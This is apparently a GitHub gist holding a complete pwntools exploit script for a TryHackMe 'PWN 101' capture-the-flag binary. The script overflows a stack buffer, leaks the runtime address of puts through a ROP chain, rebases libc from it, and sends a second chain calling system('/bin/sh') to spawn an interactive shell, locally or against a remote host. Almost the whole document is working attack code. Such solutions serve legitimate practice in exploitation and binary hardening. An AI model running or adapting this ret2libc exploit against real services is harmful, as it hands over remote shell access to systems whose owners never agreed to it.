@DanaEpp
Last active May 7, 2022 22:10
THM PWN 101 - Challenge 9 (optimized using pwntools native ROP() chains)
#!/bin/env python3
import sys
from pwn import *
# Path of the challenge binary that is started locally or under GDB.
exe = "./pwn109.pwn109"
# Parse the ELF once, then register it as pwntools' active binary so the
# architecture-dependent helpers (packing, ROP) follow the target.
elf = ELF(exe, checksec=False)
context.binary = elf
context.log_level = 'info'
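def start(argv=None, *a, **kw):
    """Open a tube to the target selected on the command line.

    With the ``GDB`` argument the local binary is started under gdb using the
    module-level ``gdbscript``; with ``REMOTE`` a TCP connection is opened to
    the host and port taken from ``sys.argv[1]`` and ``sys.argv[2]``;
    otherwise the local binary is run as a plain process.

    Args:
        argv: Extra command-line arguments for the local binary. ``None``
            (the default) means no extra arguments.
        *a: Positional arguments forwarded to the pwntools constructor.
        **kw: Keyword arguments forwarded to the pwntools constructor.

    Returns:
        The tube returned by ``gdb.debug``, ``remote`` or ``process``.
    """
    # None replaces the original mutable ``[]`` default; the value is copied
    # so the caller's list is never shared with the command line built here.
    extra_args = [] if argv is None else list(argv)
    if args.GDB:
        return gdb.debug([exe] + extra_args, *a, gdbscript=gdbscript, **kw)
    if args.REMOTE:
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    return process([exe] + extra_args, *a, **kw)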
# GDB commands used when the script is started with the GDB argument.
# The text goes through str.format(), so a literal brace in a GDB command
# has to be doubled.
gdbscript = "\ncontinue\n".format(**locals())
# Stage 1: overflow the input buffer, have the program print the runtime
# address of puts(), then return to main so the prompt is shown again.
#
# NOTE(review): the chain uses addresses taken straight from the binary
# (elf.got / elf.sym) and overwrites the saved return address directly, so it
# presumably relies on the target being built without PIE and without a stack
# canary - confirm with checksec. Enabling both is the standard hardening for
# this class of bug.

# Distance from the start of the input to the saved return address, per the
# author's note below; the binary itself is not shown here.
offset = 32 + 8 # Adjust for buffer + RBP
log.info( "Starting exploit run..." )
p = start()
log.info( "Building ROP chain to calc libc addr..." )
rop = ROP(elf)
rop.call(rop.ret) # Stack align with extra 'ret' to deal with movaps issue
# Call puts() with the address of its own GOT entry as the argument, so the
# resolved libc address of puts is written to the program's output.
rop.puts(elf.got.puts)
# Re-enter main; the second payload below waits for the same prompt.
rop.call(elf.sym.main)
log.info( "Sending payload..." )
# fit() pads with filler bytes up to `offset` and places the chain there.
p.sendlineafter( b"Go ahead \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )
# The first line received is discarded - presumably the rest of the prompt
# line; verify against the program's actual output.
p.recvline()
puts_str = p.recvline()
# puts() stops at the first NUL byte, so fewer than 8 bytes come back; pad
# with zeros before unpacking as a little-endian 64-bit value.
puts_addr = u64(puts_str.strip().ljust(8, b"\x00"))
log.info( "Puts is at %#x", puts_addr )
# Choose the libc image that matches the target: the Ubuntu 2.27 build for
# the remote service, otherwise a libc.so.6 file in the working directory.
libc = ELF(
    "libc6_2.27-3ubuntu1.4_amd64.so" if args.REMOTE else "libc.so.6",
    checksec=False,
)
# Rebase every libc symbol by subtracting puts' offset inside the file from
# the runtime address obtained in the previous stage.
libc.address = puts_addr - libc.sym.puts
log.info("libc base is at %#x", libc.address)
# Stage 2: with libc rebased, build a second chain from libc itself and send
# it through the same overflow once main prompts again.
log.info( "Building ROP chain to exec shell..." )
rop = ROP(libc)
rop.call(rop.ret) # Stack align with extra 'ret' to deal with movaps issue
# The first argument is the address of the "/bin/sh" string located inside
# libc. The two trailing zeros are passed as extra arguments; their purpose
# is not evident from this file.
rop.system(next(libc.search(b'/bin/sh')), 0, 0)
log.info( "Sending payload to get shell..." )
p.sendlineafter( b"Go ahead \xf0\x9f\x98\x8f", fit({offset:rop.chain()}) )
# Drain whatever output is still buffered, then connect the tube to the
# user's terminal.
p.clean()
p.interactive()